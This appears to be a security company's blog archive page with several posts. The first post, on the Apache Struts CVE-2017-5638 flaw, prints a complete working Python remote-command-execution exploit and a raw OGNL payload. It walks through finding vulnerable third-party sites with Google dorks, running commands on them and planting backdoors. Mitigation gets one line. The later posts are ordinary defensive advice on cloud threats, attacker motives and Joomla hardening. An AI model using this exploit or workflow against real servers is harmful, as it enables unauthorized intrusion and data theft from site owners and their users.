Showing posts with label How to secure website?. Show all posts
Showing posts with label How to secure website?. Show all posts

Thursday, 16 November 2017

Command Execution Attacks on Apache Struts server (CVE-2017-5638)

  

COMMAND EXECUTION ATTACKS ON APACHE STRUTS SERVER (CVE-2017-5638)

WHAT ARE APACHE STRUTS?

Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications. It favours convention over configuration, is extensible using a plugin architecture, and ships with plugins to support REST, AJAX, and JSON.

WHAT IS CVE 2017-5638 VULNERABILITY?

CVE 2017-5638 is a remote code execution bug that affects the Jakarta Multipart parser in Apache Struts. The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 mishandles file upload, which allows remote attackers to execute arbitrary commands via a #cmd= string in a crafted Content-Type HTTP header.
Public Exploit code for Exploiting CVE 2017-5638 (Source: Github)
#!/usr/bin/python
# -*- coding: utf-8 -*-
 import urllib2
import httplib
 def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload+="(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
payload+="(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload+="(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
     try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial
     print(page)
    return page
 if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py <url> <cmd>")
    else:
        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] cmd: %s\n" % cmd)
        exploit(url, cmd)
How to Exploit CVE 2017-5638 using above exploit:(Exploit Process)
  1. First, we will find a web application vulnerable to apache struts code execution (CVE 2017-5638) by using google dorks.
  • Once we got the dork search results, we will check if the site is vulnerable or not by using the above exploit.
  • Copy the above exploit code and save it as any name.py. Here I’m using as struts.py. Then give exploit file permission using the command ‘chmod +x 777
  • We will use the above exploit to run system commands on vulnerable application’s server. To confirm the vulnerability we will use exploit to run ‘id’ command in a remote server. Syntax for the exploit is struts.py <url> <cmd to run>
  • As we can see from the above image, the remote server is vulnerable to code execution due to the vulnerable apache struts jakarta parser plugin in “login. Action” page.
After confirming the vulnerability, an attacker or tester can run any operating system commands on the remote server based on the privileges of the remote apache tomcat server. In above image we can see that I’m getting uid=1001 which means that I don’t have root privileges to run privileged commands on remote server.
  • An attacker or tester can check for any privilege escalation vulnerabilities in remote server to get root privileges in some cases
  • Let’s run some system commands
Above command ‘ls’ gives the list of files in the server directory. In this way an attacker can take control of the server and create persistence connection to the remote server by setting up backdoor in the server. 

 OTHER EXPLOIT SOURCES

 Popular exploit framework metasploit has released exploit code for this vulnerability in its metasploit framework exploit modules. We can access that through msfconsole in kali linux or other linux distros.

MANUAL EXPLOITATION OF VULNERABILITY: (WITHOUT EXPLOIT CODE)

  For exploiting this vulnerability manually, we can use intercepting proxies like burp suite or utilities like curl which is available in Linux.

 RAW PAYLOAD FOR EXPLOITATION:

%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’id’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  •  If we use Burp suite, we can intercept the request of vulnerable application and add the above payload to the Content-Type header of request. In response we will get the result of our command.
  •  In the above payload, we need to change the #cmd parameter to the command of our choice to run on remote server. For example #cmd=ls or #cmd=id.
  • Since we are using ‘curl’ tool for this example we need to give command as “curl url H Content-type: <payload>”
  • In this way, we can manually exploit this vulnerability manually.

 MITIGATION AGAINST CVE 2017-5638

  Upgrade apache struts to the latest versions like 2.3.32 and 2.5.10.1 to avoid this kind of vulnerably.

REAL-WORLD DATA BREACHES DUE TO CVE 2017-5638

  Equifax Inc. is a consumer credit reporting agency. Equifax collects and aggregates information on over 800 million individual consumers and more than 88 million businesses worldwide.
Equifax, one of the three largest credit reporting firm in the United States, admitted that it had suffered a massive data breach somewhere between mid-May and July this year, which it actually discovered on July 29—that means the data of 143 million people were exposed for over 3 months. This data breach is due to the fact that, the company failed to patch this apache struts vulnerability in jakarta parser (CVE 2017-5638). (Source – thehackernews.com)

REFERENCES

In today’s threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. BriskInfosecadds the ability to easily block this vulnerability by providing the web application and server vulnerabilitytest.
Posted by at No comments:
Labels: , , , ,

Friday, 15 April 2016

Who is responsible for your cloud application breach?

Cloud application security has been a big concern of lately due to several data breaches occurring in the cloud services such as the icloud hack, Target, Home Depot, United States internal Revenue system. Therefore the security of application poses a question as where does the responsibility of the application security lie?
Is it with the vendor or the company or person availing the services? The answer goes both sides, as the security aspect of the server side is only covered by the vendor of the cloud application services the client side still needs the security which is mostly overlooked by the people or the companies.
The client side application security is of utmost importance as only the server side security is not enough to protect the application from security breaches.
The different kind of security threats which pose a great danger to the cloud application security are as follows:

Data breaches

  • Account Hijacking
  • Compromised credentials
  • Permanent Data loss
  • Shared Technologies
  • Cloud service abuse
  • Hacked Interface and API

 

Data Breaches

This is one of the biggest threat to the cloud services because of the vast amount of data stored on the cloud servers. The sensitivity of the data can be imagined easily, as the cloud is storing the financial details as well as personal details of millions of people. And if this vast amount of data is breached in any case it will cause a downfall of the company and also a threat to the lives of people who have been exposed due to the breach.

 

Account Hijacking

This attack has been there for a quite long time, it includes Fraud, Phishing, Software Exploits etc. Using these kind of attacks, the cloud services can be compromised and can lead to launching of other attacks, changing the settings of account, manipulate transactions, uploading malwares and illegal contents.

 

Compromised Credentials

The credentials are compromised generally due to weak passwords, casual authentication, poor key or certificate management. Also the identity access management becomes a problem as the user access are sometimes not changed with the job role and responsibilities or when the user leaves the organization.
Embedding credentials and cryptographic keys in source code and leaving them in the online repositories such as GitHub also makes a big vulnerability which can be exploited easily. Aligning the identity with the cloud provider needs an understanding of the security measures taken in account.

 

Permanent Data Loss

Malicious hackers have gained access to the cloud services and deleted data permanently in the past affecting the business. Also the cloud data centers are vulnerable to natural disasters which can swipe away the data which has been stored on the cloud.
If the user encrypts the data before uploading to the cloud and loses the key then data is lost. Thus the client side protection of data should be managed and well kept. Permanent data loss can lead to financial crisis and disruption of the working system.

 

Shared Technologies

As the cloud service providers share infrastructure, platforms and applications from different sources therefore any reconfiguration or vulnerability in these layers affects the users and can also lead to compromise of the users system as well as the cloud depending upon the potential of the vulnerability.
Thus the security alone at the cloud server side is not only the real issue, Security has to be maintained at a vast level consisting of all the aspects of the cloud environment. The client side also needs to be secured as the attacks also possible from the client side due to low or no security measures.

 

Cloud Service Abuse

Cloud applications are breached to gain access to the commanding position in the cloud where the resources can be used for different malicious purposes such as launching a DDOS attacks or sending bulk spams and phishing emails, breaking an encryption key or hosting Malicious content.
This abuse may lead to unavailability of the services or can also lead to loss of data of the users stored on the cloud, therefore it is very much necessary to secure the applications from abuse.

 

Hacked Interface and API

To build an application now the developers are using ready to use interfaces and API to make their work simple, but these API’s and Interfaces tend to be the most exposed part of the system as they are available freely on the internet.
Almost every cloud service and application now offer API, IT reams are using these interfaces to interact with the cloud services such as management, provisioning, monitoring etc. Thus the level of threat to the cloud services increases manifold. This requires rigorous code reviews and penetrating testing to secure the application and services.

 

Conclusion

As we see that there are a lot of possibilities of breaching your data stored in the cloud due to the importance of data. Therefore your data cannot be secured alone just by the cloud service provider, there is a shear work required from the client side to protect the application and data from the outer security threats. Therefore security audits should be done in order to secure your precious data from threats.

Please do not hesitate to contact us for your budget security test contact@briskinfosec.com.





Posted by at No comments:
Labels: , , ,

Wednesday, 13 April 2016

Why Hackers Can Target your Website?

Today website hacking does not limited to any one aspect or motive, there are different purpose for which websites are hacked now on a daily basis.
Defacement of website is generally what is considered as website hacking but it is not all, there is a lot more to it and is more than other things. Talking about website hacking we have classified the most sought reasons, 

which are as follows:
  • Lack of Awareness
  • Economic Gains
  • System resources
  • Revenge Hacking or Competition
  • Showing off skills
  • Script Kiddies
Capture

Lack of Awareness

This is one of the major cause of low security of the websites. People work on the outdated technologies and software, and also do not apply the vendor patches. They do not have any security measures installed to protect their websites against the attacks. This happens due to overconfidence or no knowledge about the security.
There are new ways and new vulnerabilities revealed every day which may or may not concern you but it may harm the website in some aspects, thus proper security and care of the website is very important. Once the user lose confidence due to website failure they will move to alternatives which will be a loss to the company. So to avoid this proper security measures are very important.

Economic Gains

As the name suggests this type of hacking is for Monitory Benefits. The attack of this kind are known as Drive by downloads and Blackhat SEO campaigns. Drive by Download means injecting some malicious code into the website and then affecting all the users of that website, by downloading the malicious files to their systems while Blackhat SEO refers to redirecting users to different websites which may have not been intent of the users. In this way, there will be a sense of dismal among the users giving a bad impression of the website and ultimately affecting the number of visits.
Example: Downloading a malware on user system and getting all credentials such as usernames and passwords of all the websites visited, including financial details.

System Resources

This is also a major cause for hacking of websites, the hackers use the resources such as bandwidth and physical server resources for their illegal purposes. The hackers compromise the website using the Bots and the Malicious Scripts which give them access to the server and they can use the resources as an administrator.
The bots can be used in different kind of distributed web attacks like Dos attacks, Brute force attacks or other automated attacks against other websites. Due to these illegal activities from your website your host may shut you down causing a lot of trouble for you and your users.
Example: Hacking to store illegal pirated software copies and pornographic contents. Also indulging in DOS attacks and DDOS

Revenge Hacking or Competition

Due to High competition in today’s world for providing services, there is a greater probability of your website getting hacked for the benefit of other websites.
Also the losses suffered by others due to your good services may come as a revenge threat. There may be some group of people who would like to bring down your website to bring a bad name and a situation of distrust among the users.
Example: Company A & B are into same business, A gets Hacked so the customers of A will be going to B for services thus eliminating A as a competition.

Show Off

Several Hackers just hack the websites for fun and showing off theirs skills to the hacker community to get name and fame. This kind of hacking is done without any purpose it just exploits the security vulnerabilities present in your website. There are a lot of hackers of this kind who continuously look out for vulnerable websites and hack them thus affecting the website and its services for quite some time.
Example: Posting the defaced website links and screen shots on public domain with the coded name and claiming to have hacked it.

Script Kiddies

Script Kiddies are the people who do not have the working knowledge of the computer and networks, they are people who are trying to hack a website using the scripts written by other hackers without understanding the process of hacking.
Script Kiddies do these things to make themselves famous among their peers to get recognition as a hacker or to attract attention of someone. There is no other motive than this, and any website having vulnerability can be exploited by the script kiddies, which will hinder the services of the website and will upset the users.

Conclusion

As your website holds your presence online therefore it is important to secure it. Also it gives your some revenue from the advertisements if it holds any. People are less aware of the website security threats in compare to web applications which leads them to be an easy bait for the hackers to bring down their website.
People will lose their trust on your services if your website is hacked, therefore proper security methods are required to secure your website from the threats, which can be implemented after a security audit by a professional or security company.
We are offering such website security services at a very decent price of $99, if you need any kind of security services do contact us at contact@briskinfosec.com

Posted by at No comments:
Labels: , , , ,

Thursday, 7 April 2016

Security Test Checklist for Joomla 3

Any website can be hacked. There is no set of security steps that you can take to keep your site 100% safe from hacking. Hackers may be malicious and actually steal information from your site. Other hackers may be pranksters that simply want to bring down your site and replace it with obnoxious graphics. Your site could be hacked and you don't even know it, the hackers are just monitoring the site to see if any goodies show up.
There are steps that you can take that increase the security of your site and make it safer. 

Basic security steps:

Only install official versions of Joomla.

Joomla installations are often included with third party templates. They offer a one step install where you install Joomla and their template is already set up as the default with all its custom appearance, functionality, components and plugins. Be very wary of these offers. Be sure that these are popular and highly regarded templates. If they don't offer the option of installing the template separately from the Joomla installation, steer clear. It could be that the Joomla version has core files that have been changed, causing conflicts with other extensions and upgrades. It could be that the plugins they have installed have vulnerabilities.

Never use 'admin' as a login name, never

Do not use admin or other obvious login names for logging into your Joomla site. If you have multiple contributors, do not use some standard way of creating login names, such as last name-first initial. It makes it too easy to figure out for others. You may think that the password will be enough, but having an obvious login name is a foot in the door.

Use well formed and unique passwords

Passwords should never be regular words. They should be a long combination of upper and lower case letters, numbers and a special character or two or three. The more characters in your password, the better.

Change your password from time to time

It is a good idea to change your login password on a regular basis.

Never give your password to others to get into the site

Even if you trust someone completely, it is better to create a user account that you can delete later. 

Backup, backup, backup

Backup your site's files and database regularly. Backup again before making major changes or installing any extension or template. Backup before running upgrades.

Keep your Joomla site up to date

Upgrading can be a bothersome task, but it is still better to take the steps to upgrade if a new version comes out. Newer versions will have fixed known security issues.

Check your Users list in User Manager

See if there are any registered users that should not be there. If there are, it may mean that your site has already been hacked.

Remove the login module if you don't use it

If you don't need people to login into the front end, remove or unpublish the login module. You can still login to the front end of your site by adding
index.php?option=com_users&view=login
to the end of your url if you need to.
The login form creates an open invitation to hackers. Keep in mind, a Joomla hacker will know how to get to the login form even without a login form displayed in a module or page. Removing the login form will only keep out the novice hacker.

Turn off user registration, if you don't need it

If you don't have a forum, allow comments or have some other reason for users to register, turn off Allow User Registration in the Global Configuration for Users Manager. If you do leave it on, never allow users to be any level higher than Registered unless you take manual steps to allow them more permissions.

Installing Extensions

Backup your site before installing extensions

Backup your entire site, folders and database, before installing any extension or running any upgrade.
Learn how to restore the backed up files and database in the case that your site is hacked.

Only use popular and highly rated extensions

Check extensions.joomla.org for the rating on any extension. Popular extensions will likely keep up with Joomla upgrades. Even good and popular extensions can introduce security loopholes. If an extension is not listed at extensions.joomla.org, it probably should not be installed.

Review the Joomla Vulnerable Extension list

You can see a list of extensions that have known issues at vel.joomla.org. Some extension providers will have fixed the problems and have a newer version, so watch what version is on the Vulnerability list.

Only use Open Source extensions

Extensions, whether components or plugins, can come open-source or encrypted. If they are open-source, the code is all visible as PHP, JavaScript or other readable script. If it is encoded, there is an added possibility that it has hidden security risks.

Install Security Extensions

Go to extensions.joomla.org and research Joomla extensions that increase site security, if added security is important for your site. Some of these extensions will have lockouts for someone entering a wrong password too many times, so be sure YOU don't try too many passwords.

Minimize the number of extensions you have installed

The more extensions you have installed, the more places for hackers to break into your site. You should also minimize the number of extensions for site speed and ease of upgrading.

Your Hosting Environment, Folders, Files and Database

Consider using an SSL server 

Sites that have an SSL certificate have https:// for the protocol. This protocol uses encryption to send data over the web. It is not 100% safe, but it is much safer than not having this functionality. This protocol does not protect your site itself from hackers, it simply encrypts the data being uploaded and downloaded. You should purchase an SSL certificate if you:
  • Deal with any personal information about your registered users, even something like email addresses or phone number
  • If your site deals with money transaction
  • If you have forms that ask for personal information, such as event registration, forum registration, etc.

Use dedicated servers if possible

Most discount web hosting use shared hosting to keep the costs down. If you have a site with information that should not be public, consider the added costs of dedicated hosting. This way, your Joomla site is on its own server. As an added benefit, dedicated servers are also much faster than shared servers as far as downloading large web sites.

Protect your hosted folders and files

Watch the permission settings on your folders and files. Hackers can tell you have a Joomla site by simply looking at the source code and will know which files have security vulnerabilities. Folders should have permission level of 755 and files 644. Unfortunately if you assign even higher security permission levels, you can break your site as Joomla needs to access certain files and folders to work properly.

If you create new folders, add an index.html placeholder file

If you create folders in your Joomla installation via FTP or through your hosting control panel, you should include a placeholder index.html file in the folder along with the other files. This keeps hackers from being able to list the content of the folder in a browser window.

Keep your site's folders and files tidy

Remove any unused files or folders. Be sure to remove the installation folder after installing Joomla, don't just rename it.

Use separate login and password for hosting login, database login and Joomla login

Do not use the same login and password for your Joomla site as for your hosting account and/or database. This is like having the same set of keys for every item you own. If the thief has one set of keys, he can steal everything.

.htaccess security steps

You can add lines to your .htaccess file that will keep the casual hacker from accessing specific folders.

My Joomla site has already been hacked, what do I do?

Refer to this Joomla.org article:
https://docs.joomla.org/Security_Checklist/You_have_been_hacked_or_defaced
Posted by at No comments:
Labels: , , , ,

Wednesday, 16 March 2016

Is your WEB SITE safe? No, I’m not asking about your web Application!

 You got the question right? Well-nigh everyone chooses Web Applications over web sites, which clarifies that Web sites are unfortunately prone to security risk. Websites contains only information’s whereas Web Application is a service over website i.e performing certain tasks / interacting with the users etc. 

Web application security is expensive, yields more profit to security companies, and this is why Security companies concern about web applications but not websites. Websites have static content where the data displayed is the same for every visitor and content changes are infrequent. Web applications are dynamic and ever-changing, it relies on user interaction and the contents contributed to it. Everyone cared about Web application hence it contains interacted information, but they forgot websites – The Origin. Can’t believe? Now, Google it yourself and check out the priority!

“Web apps are the new future! Website is your past and present, which can make your future pleasant / unpleasant!! Better treat it right way”. Comparing the both, websites are more in number so as its security issues. Most of the Web Application source codes are kept confidential for security purpose on contrary web site source codes are often openly available. This is one main reason, why websites are easily compromised.

Website compromising-Intentions behind!
  • Heist of personal or sensitive data.
  • Devastating the reputation.
  • Altering website content.
  • Intercepting confidential data.
  • Making Services unavailable by performing DoS attacks.
Website -Security Glitch!
Websites contain both general and confidential information’s such as employee details, contact information and goes on.
  • Reputation of the organization/Institution is devastated.
  • Website compromising often leads to major attack.(Preparation Phase)
  • Initial phase of any attack is information gathering, which is started from the corresponding websites.
  • Phishing attacks are done often by using contact details.
Security Measures
  • Using cross-platform compatible encryption: Choose Encryption method which supports all platform and doesn’t unnecessarily limit user base.
  • Managing Website via encrypted connections: Using unencrypted connections such as unencrypted FTP or HTTP, prevents man-in-the-middle and login/password sniffing attack.
  • Data validation: Any input given by user must be validated; by this attacks like SQL injections are avoided.
  • Encrypted Login pages: If Authentication is to check the validity whereas Encryption is to maintain the validity.
Conclusion:
Remember the proverb? “Elephants are not afraid of mice, but terrified by Ants”, Got it now? How reputed your organizations is, a small attack on your website destroy everything! Almost Everything. Top companies concerned only about web applications (Mice) not the websites (Ants), because mice are what the profit yielders while websites is their assets. Websites are a huge part of the web and plays vital role in offering many information’s. More the information, more it gets compromised soon. Discovering the vulnerabilities / threats is one difficult task .People who are preferred them as Hackers, without much knowledge are often try their skills here only, thus unknown threat like this are more vulnerable compared to identified threats. Thus Security for websites is more significant.

WebsitePentest:
We, Brisk Infosec provide website security services for any organizations. Guarantee for securing your websites from any vulnerabilities and attacks with ethical touch. We offer $99 for website security services. Website security organizations are like a black cat in a coal cellar, very hard to find. Brisk Infosec is one among them with more professional security analyst, who provides services in economical fixed prices and most importantly a trustworthy organization.

References:


Posted by at No comments:
Labels: , , , , ,
Subscribe to: Posts (Atom)